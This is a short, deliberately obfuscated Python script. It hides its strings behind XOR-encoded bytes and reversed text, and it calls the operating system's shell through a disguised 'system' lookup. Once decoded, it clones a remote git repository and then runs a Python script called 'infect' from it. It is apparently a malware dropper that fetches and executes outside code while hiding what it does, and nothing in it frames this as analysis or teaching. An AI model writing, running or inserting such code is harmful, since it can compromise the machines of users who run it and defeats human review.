OO1l1ll0010l0Olll0lOO = (lambda ll01l1011l011OOOOlO0l,
    O01O1l0011Olll0lO0l0O: ll01l1011l011OOOOlO0l + O01O1l0011Olll0lO0l0O)
Ol1O101lO1O00Ol0001ll = (lambda Ol11lO01000O11l001l10,
    O10OOO001O100lOO00l01: Ol11lO01000O11l001l10 ^ O10OOO001O100lOO00l01)
ll0001lO10l1O1l1OO001 = __import__(''.join(chr(l11O1l1Ol10O1100O11Ol ^
    lO111OO11O0lO00010O1O) for lO111OO11O0lO00010O1O, l11O1l1Ol10O1100O11Ol in
    zip(b'\xa4\xe5', b'\xd6\x80')), globals(), locals(), [], 0)
lO00l00lOOlllllOOOlll = __import__(''.join(chr(O0lOO110lO0ll10l0O0Ol ^
    OlO1O0O0l011O10l10010) for OlO1O0O0l011O10l10010, O0lOO110lO0ll10l0O0Ol in
    zip(b'\xef\x11', b'\x80b')), globals(), locals(), [], 0)
print(''.join(filter(lambda Ol111lO1OlOlOOl0lOOlO: ord(
    Ol111lO1OlOlOOl0lOOlO) % 6 != 0, '\x06$x\x1e\x00x6lr\x18T*fx*')).join(
    chr(Ol0O1Ol0Ol1OOl01O01ll ^ O11lO00OO0llO0l100Oll) for 
    O11lO00OO0llO0l100Oll, Ol0O1Ol0Ol1OOl01O01ll in zip(
    b'\xd6\xe2*\x8d\x80q6F{\xd5y\x8f\xb7;r5<\xa1\xb1\x8d\xceR\xd1T',
    b'\xcd\xb9\x1a\xb6\xb9A[\x12\x14\xba\x15\xaf\xdeU\x01A]\xcd\xdd\xec\xba;\xbe:'
    )))
getattr(lO00l00lOOlllllOOOlll, 'metsys'[::-1])(''.join(chr(
    Ol1O101lO1O00Ol0001ll(OO111O1l10l1OO011OllO, OOOOO1101O1100001OlOO)) for
    OOOOO1101O1100001OlOO, OO111O1l10l1OO011OllO in zip(
    b"7\x9b\xa4z6U\xd22\xd8o\xc2\x15\xb4gA\xf5<\xd7z\xba\x96$\x04\xe6'1\x96\xf9\x0cA\xc8f\xa9\xd7\xa77\x7f\xf6\x1aI0\xea\xc5\x83\xfe\x88\xfbu\xa5=Q"
    ,
    b'P\xf2\xd0ZU9\xbd\\\xbdO\xaaa\xc0\x172\xcf\x13\xf8\x1d\xd3\xe2Lq\x84\tR\xf9\x94#\t\xa9\x0c\xc8\xb8\xc6]\x1e\x94r(_\x8b\xad\xb4\xc9\xfc\x8fZ\x8bT?'
    )))
getattr(lO00l00lOOlllllOOOlll, ''.join(chr(O001OO101O1OOO1ll1ll0 ^
    O0Ol01O1OO0l00l00Ol1O) for O0Ol01O1OO0l00l00Ol1O, O001OO101O1OOO1ll1ll0 in
    zip(b'\xd3\x01YF\x95"', b'\xa0x*2\xf0O')))(''.join(chr(
    l1OOO0lO0O0lOlOl0l0Ol ^ l1OlO01OO1010001OlO0l) for 
    l1OlO01OO1010001OlO0l, l1OOO0lO0O0lOlOl0l0Ol in zip(
    b'w#\xdd\xd3"D\xcf\x88` \xba\xba\xee',
    b'\x14G\xfd\xfdK*\xef\xaeF\x00\xca\xc3\x9a')) + 'ox.tcefni 2noh'[::-1])
